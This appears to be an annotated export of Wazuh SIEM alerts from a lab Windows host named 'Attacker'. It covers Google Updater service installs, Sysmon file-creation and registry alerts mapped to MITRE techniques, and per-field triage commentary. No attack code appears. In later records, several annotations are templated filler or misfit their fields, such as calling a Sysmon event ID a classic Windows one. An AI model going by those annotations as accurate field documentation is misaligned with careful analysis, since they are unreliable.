data.win.system.eventRecordID: 2985 Record number in the System log; gaps or a reset in this sequence can mean the log was cleared.
data.win.system.processID: 772 PID of the process that wrote the event: services.exe, the same PID the Sysmon Event ID 13 alert further down shows writing the service's ImagePath.
data.win.system.threadID: 9712 Thread that wrote the event.
data.win.system.channel: System The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Google Updater Service (GoogleUpdaterService137.0.7129.0)
Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem" The event text as the Service Control Manager rendered it; the eventdata.* fields below are its parsed form.
data.win.eventdata.serviceName: Google Updater Service (GoogleUpdaterService137.0.7129.0) Display name the installer gave the service; for Google Updater the registry key name is the part in parentheses. This is the field attackers choose to look legitimate, so never triage on the name alone.
data.win.eventdata.imagePath: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update The command line the SCM will run as the service. Check three things: the binary's Authenticode signature, that its directory is not writable by unprivileged users, and that a path containing spaces is quoted, as it is here (an unquoted one is the classic service-path hijack, T1574.009).
data.win.eventdata.serviceType: user mode service A normal Win32 service rather than a kernel-mode driver.
data.win.eventdata.startType: auto start Launches at boot with no user involved; that is the persistence.
data.win.eventdata.accountName: LocalSystem The most privileged account on the host, so from the next boot this binary runs with full control of the machine.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Here it is routine housekeeping: the Windows licensing service scheduled its own next check.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534039.582303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP The Software Protection Platform, Windows licensing and activation; "Security" in the name does not make it a security control.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} GUID of the provider; prefer it to the name in rules.
data.win.system.eventSourceName: Software Protection Platform Service Legacy source name for the same provider.
data.win.system.eventID: 16384 SPP scheduled its own restart for the next licence check. Periodic housekeeping (this rule has fired 8 times here); a candidate for suppression rather than review.
data.win.system.version: 0 Event template version.
data.win.system.level: 4 4 = Informational.
data.win.system.task: 0 No task category set by this provider.
data.win.system.opcode: 0 0 = Info.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:48.8829916Z Time the event was written on the endpoint, in UTC.
data.win.system.eventRecordID: 2398 Record number in the Application log.
data.win.system.processID: 7908 PID of the logging process, the SPP service.
data.win.system.threadID: 0 Not recorded by this provider.
data.win.system.channel: Application The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:48Z. Reason: RulesEngine." The rendered text: the restart is scheduled just under 24 hours out, the normal re-validation cadence.
data.win.eventdata.data: 2025-04-25T22:31:48Z, RulesEngine The raw parameter list the message was built from (restart time, reason).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. The trigger here is a write under C:\Windows\SystemTemp, the locked-down temp directory that SYSTEM-level installers use on current Windows, by Google's updater running as SYSTEM. A generic file-drop rule fires on every installer, so confirm the writing Image and its signature before treating this as tool transfer.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534053.583882 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon Sysinternals Sysmon is the source, so field meanings follow Sysmon's schema, not the System log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider.
data.win.system.eventID: 11 Sysmon Event ID 11, FileCreate: a file was created or overwritten. This is a Sysmon id, not a classic Windows one; 11 in the System log means something else.
data.win.system.version: 2 Sysmon's schema version for this event.
data.win.system.level: 4 4 = Informational; Sysmon logs everything at this level.
data.win.system.task: 11 For Sysmon the task id mirrors the event id.
data.win.system.opcode: 0 0 = Info.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:58.6481860Z Time Sysmon wrote the record (2025-04-20). The Wazuh alert id shows the manager received it on 2025-04-24, four days later; timeline on this field, not on the alert id.
data.win.system.eventRecordID: 225059 Record number in the Sysmon/Operational log; the three file-drop alerts here are records 225059, 225097 and 225099, which fixes their order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the event; the subject's PID is eventdata.processId.
data.win.system.threadID: 4740 Sysmon's writing thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:58.647
ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00}
ProcessId: 12284
Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
CreationUtcTime: 2025-04-20 01:40:58.647
User: NT AUTHORITY\SYSTEM" The rendered FileCreate text; the eventdata.* fields below are its parsed form.
data.win.eventdata.utcTime: 2025-04-20 01:40:58.647 When the file was written, in UTC.
data.win.eventdata.processGuid: {94294ddc-50a3-6804-9f08-000000000e00} GUID of the writing process; join it to that process's Event ID 1 to see how it was launched.
data.win.eventdata.processId: 12284 PID of the writing process.
data.win.eventdata.image: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe The process that wrote the file: Google's installed updater, version 137.0.7115.0, running as SYSTEM.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe The file written: a new UpdaterSetup.exe unpacked into a per-run folder under C:\Windows\SystemTemp. An executable dropped into a temp path and then run is exactly the pattern this rule watches for, which is why a legitimate self-updater trips it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:58.647 Creation timestamp of the file on disk. Equal to UtcTime for a brand-new file, as here; an older value means an existing file was overwritten.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the writing process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.586712 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon Sysinternals Sysmon is the source.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider.
data.win.system.eventID: 11 Sysmon Event ID 11, FileCreate.
data.win.system.version: 2 Sysmon's schema version for this event.
data.win.system.level: 4 4 = Informational.
data.win.system.task: 11 Mirrors the event id.
data.win.system.opcode: 0 0 = Info.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.0804559Z Time Sysmon wrote the record, four days before the manager received it; timeline on this field.
data.win.system.eventRecordID: 225097 Record number in the Sysmon/Operational log.
data.win.system.processID: 3712 Sysmon's own PID, not the subject process.
data.win.system.threadID: 4740 Sysmon's writing thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:59.072
ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00}
ProcessId: 10268
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\uninstall.cmd
CreationUtcTime: 2025-04-20 01:40:59.072
User: NT AUTHORITY\SYSTEM" The rendered FileCreate text; the eventdata.* fields below are its parsed form.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.072 When the file was written, in UTC.
data.win.eventdata.processGuid: {94294ddc-50aa-6804-b308-000000000e00} GUID of the writing process.
data.win.eventdata.processId: 10268 PID of the writing process.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe The UpdaterSetup.exe dropped in the previous alert, now running and unpacking further files: the chain is the installed updater.exe (7115.0), then UpdaterSetup.exe, then a second per-run folder.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\uninstall.cmd The file written, an uninstall script staged in a folder named after the writer's PID.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:59.072 Equal to UtcTime, so a brand-new file rather than an overwrite.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the writing process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.589514 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon Sysinternals Sysmon is the source.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider.
data.win.system.eventID: 11 Sysmon Event ID 11, FileCreate.
data.win.system.version: 2 Sysmon's schema version for this event.
data.win.system.level: 4 4 = Informational.
data.win.system.task: 11 Mirrors the event id.
data.win.system.opcode: 0 0 = Info.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.0805033Z Time Sysmon wrote the record, four days before the manager received it; timeline on this field.
data.win.system.eventRecordID: 225099 Record number in the Sysmon/Operational log; two records after the uninstall.cmd drop.
data.win.system.processID: 3712 Sysmon's own PID, not the subject process.
data.win.system.threadID: 4740 Sysmon's writing thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:40:59.074
ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00}
ProcessId: 10268
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe
TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\updater.exe
CreationUtcTime: 2025-04-20 01:40:59.074
User: NT AUTHORITY\SYSTEM" The rendered FileCreate text; the eventdata.* fields below are its parsed form.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.074 When the file was written, 2 ms after uninstall.cmd.
data.win.eventdata.processGuid: {94294ddc-50aa-6804-b308-000000000e00} Same GUID as the previous alert: the same UpdaterSetup.exe instance.
data.win.eventdata.processId: 10268 PID of the writing process.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe The unpacked setup binary, still staging files.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\updater.exe The new updater.exe staged next to uninstall.cmd. This is the staging copy; the service registered in the alerts above points at the copy under Program Files (x86)\Google\GoogleUpdater\137.0.7129.0, so the signature check belongs on that file.
data.win.eventdata.creationUtcTime: 2025-04-20 01:40:59.074 Equal to UtcTime, so a brand-new file rather than an overwrite.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the writing process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
🧠 What happened? services.exe (PID 772), the Service Control Manager, wrote the ImagePath value of a new service, GoogleUpdaterInternalService137.0.7129.0, pointing it at Google's updater.exe with --service=update-internal. By the event's own UtcTime this was 2025-04-20 01:40:59, a quarter of a second after UpdaterSetup.exe finished unpacking updater.exe and uninstall.cmd under C:\Windows\SystemTemp (the three file-drop alerts above). The 7045 alert above records the sibling GoogleUpdaterService137.0.7129.0 (--service=update) on the same binary, but with a systemTime of 2025-04-24: either the Sysmon records reached the manager four days late or the service was registered again, so order these events on their own timestamps rather than on alert ids.
🔍 Why it's important: T1543.003 (Create or Modify System Process: Windows Service) is one of the most common persistence and privilege-escalation techniques; whatever ImagePath names runs as LocalSystem at every boot. The check that settles it is the binary, not the service name: confirm the Authenticode signature and hash of the file at that path, that its directory is not writable by unprivileged users, and that the 7045 and this registry write point at the same file.
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534054.592308 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon Sysinternals Sysmon is the source.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider.
data.win.system.eventID: 13 Sysmon Event ID 13, RegistryEvent (Value Set): a registry value was written. Sysmon only records the keys its configuration names, and service ImagePath values are in every sensible config.
data.win.system.version: 2 Sysmon's schema version for this event.
data.win.system.level: 4 4 = Informational.
data.win.system.task: 13 Mirrors the event id.
data.win.system.opcode: 0 0 = Info.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.3171080Z Time Sysmon wrote the record; four days before the manager received it, so timeline on this field.
data.win.system.eventRecordID: 225118 Record number in the Sysmon/Operational log, 19 records after the last file drop.
data.win.system.processID: 3712 Sysmon's own PID; the subject process is eventdata.processId.
data.win.system.threadID: 4740 Sysmon's writing thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker Hostname that logged the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:40:59.311
ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath
Details: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
User: NT AUTHORITY\SYSTEM" The rendered RegistryEvent text; the eventdata.* fields below are its parsed form.
data.win.eventdata.eventType: SetValue A value was written. Sysmon 12 covers key create/delete and 14 covers renames; 13 is the one that carries the data written.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.311 When the value was written, in UTC.
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} GUID of the writing process. Its start-time segments (0x67feea7f) date it to 2025-04-15, the last boot, as expected for services.exe.
data.win.eventdata.processId: 772 PID of the writing process: services.exe, the same PID that logged the 7045 above.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe The Service Control Manager. It writes ImagePath on behalf of whoever called CreateService, so the requesting process is not in this event; the installer's Sysmon Event ID 1, or Security 4697, supplies it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath The registry value that defines what the service executes; the ImagePath value name under Services is what this detection keys on.
data.win.eventdata.details: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal The value written. Same binary as the 7045 service above but with --service=update-internal: Google Updater installs two services over one executable, so verifying the signed binary once covers both.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the writing process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534057.595757 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:01.6661763Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225394 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:01.664
ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00}
ProcessId: 12284
Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\135.0.7049.96_135.0.7049.86_chrome_updater.exe
CreationUtcTime: 2025-04-20 01:41:01.664
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:01.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a3-6804-9f08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\135.0.7049.96_135.0.7049.86_chrome_updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:41:01.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534057.598703 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:01.9448813Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225427 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:01.943
ProcessGuid: {94294ddc-50ad-6804-ba08-000000000e00}
ProcessId: 13184
Image: C:\Program Files\Google\Chrome\Application\135.0.7049.86\Installer\setup.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe
CreationUtcTime: 2025-04-20 01:41:01.943
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:01.943 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50ad-6804-ba08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.86\\Installer\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
